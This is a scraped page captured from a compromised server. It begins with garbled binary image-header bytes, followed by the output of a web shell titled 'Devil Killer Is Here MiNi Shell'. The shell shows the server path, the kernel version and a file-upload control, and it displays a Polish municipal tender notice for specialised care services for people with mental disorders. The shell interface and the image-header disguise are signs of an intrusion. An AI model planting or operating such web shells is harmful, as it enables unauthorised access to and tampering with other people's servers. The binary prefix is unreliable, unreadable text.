JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220301/0007183301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie specjalistycznych usług opiekuńczych w miejscu zamieszkania dla osób z zaburzeniami psychicznymi w okresie od 01 kwietnia 2022 r. do 29 grudnia 2022r.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Pomocy Społecznej w Łęczycach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192592827</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Długa 53</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łęczyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-218</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@opsleczyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.opsleczyce.nv.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie specjalistycznych usług opiekuńczych w miejscu zamieszkania dla osób z zaburzeniami psychicznymi w okresie od 01 kwietnia 2022 r. do 29 grudnia 2022r.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c7f486bf-9974-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00071833</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039937/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w miejscu zamieszkania w okresie od 01 kwietnia 2022 r. do 30 grudnia 2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-c7f486bf-9974-11ec-baa2-b6d934483bfb <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl, https://epuap.gov.pl/wps/portal, sekretarariat@opsleczyce.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja pomiędzy Zamawiającym, a wykonawcami będzie możliwa w formie elektronicznej, co pociąga za sobą konieczność posiadania kwalifikowanego podpisu elektronicznego lub podpisu osobistego lub podpisu zaufanego.<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiający, a Wykonawcami odbywa się w języku polskim przy użyciu środków komunikacji elektronicznej, tj.: <br/>1)	miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, oraz (za wyjątkiem składania ofert i dokumentów składanych wraz z ofertą)<br/>2)	ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal. <br/>3)	poczty elektronicznej: sekretarariat@opsleczyce.pl <br/>3. Oficjalny adres Elektronicznej Skrytki Pocztowej ESP : /opsleczyce/SkrytkaESP<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz komunikacji”.<br/>5. W formularzu oferty wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym może być prowadzona korespondencja związana z postępowaniem.<br/>6. Zamawiający nie przewiduje komunikowania się z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej. <br/>7. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w „Regulaminie korzystania z systemu miniPortal”, „Instrukcja użytkowania systemu miniPortal” oraz „Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP)”.<br/>8. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularz do komunikacji” wynosi 150 MB.<br/>9. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (RODO) informujemy, że: <br/>1. Administrator Twoich danych: Kierownik Ośrodka Pomocy Społecznej w imieniu: Ośrodek Pomocy Społecznej w Łęczycach, ul. Długa 53, 84-218 Łęczyce <br/>2. Dane kontaktowe- z Administratorem można się skontaktować: <br/>1) osobiście lub na adres poczty elektronicznej: sekretariat@opsleczyce.pl, <br/>2) telefonicznie: 58 678 92 10 <br/>3) pisemnie: ul. Długa 53, 84-218 Łęczyce<br/>3. Inspektor Ochrony Danych: W Ośrodku Pomocy Społecznej w Łęczycach został wyznaczony Inspektor Ochrony Danych, z którym można się skontaktować poprzez adres poczty elektronicznej: iodo@leczyce.pl lub pisemnie (na adres siedziby Ośrodka Pomocy Społecznej w Łęczycach). Z Inspektorem Ochrony Danych można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych.<br/>4. Cele przetwarzania, podstawa prawna przetwarzania, czas przechowywania poszczególnych kategorii danych: Dane będą przetwarzane przez Ośrodek Pomocy Społecznej w Łęczycach wyłącznie w celu: <br/>1) wypełniania obowiązków prawnych - w tej sytuacji podanie danych jest obowiązkowe (na podstawie art. 6 ust. 1 lit. c - ciążących na Ośrodku Pomocy Społecznej w szczególności zadań wynikających z: a) Ustawa z dnia 11 września 2019 r. – Prawo zamówień publicznych; <br/>w celu związanym z postępowaniem o udzielenie zamówienia nr OPS.272.2.2022.SUO<br/>Dane będą przechowywane przez okres 4 lat od zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5. Odbiorcy danych: Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o ustawę z dnia 11 września 2019 r. – Prawo zamówień publicznych (tj. Dz. U. z 2021 r. poz. 1129 ze zm.), dalej „ustawa Pzp”; <br/>6. Prawa osoby, której dane dotyczą: Posiada Pani/Pan:<br/>a)na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*; <br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**; <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>7. Nie przysługuje Pani/Panu: <br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu postępowania oraz jego załączników; <br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OPS.272.2.2022.SUO</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych w miejscu zamieszkania dla osób z zaburzeniami psychicznymi w ramach realizacji zadań zleconych gminie na podstawie art. 18 ust. 1 pkt 3 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz.U z 2021 r., poz. 2268 ze zm.), zwanych dalej „Usługami” w okresie od 01 kwietnia 2022 r. do 29 grudnia 2022r.<br/>1)	część I – „uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-04-01 do 2022-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejszą ofertą będzie oferta, która przedstawi najkorzystniejszy bilans ceny i kryteriów poza cenowych – termin płatności.<br/>Punkty będą wyliczane zgodnie z niżej podanymi zasadami, przyjmując, że 1 % = 1 punkt.<br/><br/>1. Kryterium „Cena” w PLN: C = Cmin∶Cbad x 60 % x 100 = ….. pkt<br/>C - liczba uzyskanych punktów za kryterium ceny (ocenianej oferty)<br/>C min - najniższa cena ofertowa<br/>C bad - cena oferty badanej<br/><br/>Przy ocenie ofert porównuje się wartość ofert brutto. W tym kryterium można otrzymać maksymalnie 60 punktów. <br/>Uzyskana z wyliczenia ilość punktów zostanie ostatecznie ustalona z dokładnością do drugiego miejsca po przecinku z zachowaniem zasady zaokrągleń matematycznych.<br/>Zamawiający wybiera ofertę przedstawiająca najniższą cenę.<br/><br/>2. Kryterium „Termin płatności” (T)” <br/>Przy kryterium „Termin płatności” (T) Zmawiający rozumie termin (maksymalną ilość dni) na zapłatę za świadczenie specjalistycznych usług opiekuńczych. <br/>W kryterium tym można uzyskać maksymalnie 40 punktów. Wykonawca otrzyma odpowiednią liczbę punktów na podstawie danych zawartych w Formularzu ofertowym w punkcie odnoszącym się do wskazania terminu płatności (T). <br/>Ocena punktowa kryterium „Termin płatności” dokonana zostanie wg przedziału: <br/>a) termin płatności od 0 do 7 dni – 0 pkt; <br/>b) termin płatności od 8 do 14 dni – 15 pkt; <br/>c) termin płatności od 15 do 21 dni - 30 pkt; <br/>d) termin płatności od 22 dni i powyżej – 40 pkt.<br/><br/>3. Oferta przedstawiająca najkorzystniejszy bilans punktów w kryterium „Cena” (C) i „Termin płatności (T)”, czyli oferta, która otrzyma najwyższą liczbę punktów obliczoną według wzoru:<br/>N = C + T<br/>Zostanie wybrana jako najkorzystniejsza, gdzie<br/>N – oznacza łączną sumę punktów otrzymanych w kryterium „Cena” (C) i „Termin płatności”(T). Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych w miejscu zamieszkania dla osób z zaburzeniami psychicznymi w ramach realizacji zadań zleconych gminie na podstawie art. 18 ust. 1 pkt 3 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz.U z 2021 r., poz. 2268 ze zm.), zwanych dalej „Usługami” w okresie od 01 kwietnia 2022 r. do 29 grudnia 2022r.<br/>2. Postępowanie podzielone jest na części:<br/>1)	część II – „rehabilitacja fizyczna i usprawnienie zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-04-01 do 2022-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejszą ofertą będzie oferta, która przedstawi najkorzystniejszy bilans ceny i kryteriów poza cenowych – termin płatności.<br/>Punkty będą wyliczane zgodnie z niżej podanymi zasadami, przyjmując, że 1 % = 1 punkt.<br/><br/>1. Kryterium „Cena” w PLN: C = Cmin∶Cbad x 60 % x 100 = ….. pkt<br/>C - liczba uzyskanych punktów za kryterium ceny (ocenianej oferty)<br/>C min - najniższa cena ofertowa<br/>C bad - cena oferty badanej<br/><br/>Przy ocenie ofert porównuje się wartość ofert brutto. W tym kryterium można otrzymać maksymalnie 60 punktów. <br/>Uzyskana z wyliczenia ilość punktów zostanie ostatecznie ustalona z dokładnością do drugiego miejsca po przecinku z zachowaniem zasady zaokrągleń matematycznych.<br/>Zamawiający wybiera ofertę przedstawiająca najniższą cenę.<br/><br/>2. Kryterium „Termin płatności” (T)” <br/>Przy kryterium „Termin płatności” (T) Zmawiający rozumie termin (maksymalną ilość dni) na zapłatę za świadczenie specjalistycznych usług opiekuńczych. <br/>W kryterium tym można uzyskać maksymalnie 40 punktów. Wykonawca otrzyma odpowiednią liczbę punktów na podstawie danych zawartych w Formularzu ofertowym w punkcie odnoszącym się do wskazania terminu płatności (T). <br/>Ocena punktowa kryterium „Termin płatności” dokonana zostanie wg przedziału: <br/>a) termin płatności od 0 do 7 dni – 0 pkt; <br/>b) termin płatności od 8 do 14 dni – 15 pkt; <br/>c) termin płatności od 15 do 21 dni - 30 pkt; <br/>d) termin płatności od 22 dni i powyżej – 40 pkt.<br/><br/>3. Oferta przedstawiająca najkorzystniejszy bilans punktów w kryterium „Cena” (C) i „Termin płatności (T)”, czyli oferta, która otrzyma najwyższą liczbę punktów obliczoną według wzoru:<br/>N = C + T<br/>Zostanie wybrana jako najkorzystniejsza, gdzie<br/>N – oznacza łączną sumę punktów otrzymanych w kryterium „Cena” (C) i „Termin płatności”(T). Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VII.<br/>2. Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik nr 4 do niniejszego SWZ. <br/>3. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia się wymagań;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia się wymagań;<br/>3)	sytuacji ekonomicznej i finansowej: Zamawiający nie stawia się wymagań;<br/>4)	zdolności technicznej lub zawodowej: Zamawiający stawia wymagania, które dotyczą:<br/>a) Osób zdolnych do wykonania zamówienia: o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że dysponują:<br/>a)	do wykonania zamówienia w części I – co najmniej 2 osobami<br/>b)	do wykonania zamówienia w części II – co najmniej 1 osobą <br/><br/>Zamawiający nie wymaga, aby wykonawca dla każdej z części zamówienia przedstawił inne osoby. Jedna osoba może zostać wpisana do każdej z części zamówienia, jeżeli spełnia wymogi Zamawiającego do świadczenia specjalistycznych usług opiekuńczych przypisane do konkretnej części zamówienia, określone w ust. 4. <br/><br/>4. Zamawiający wymaga by osoby świadczące specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi posiadały kwalifikacje do wykonywania zawodu, staż, 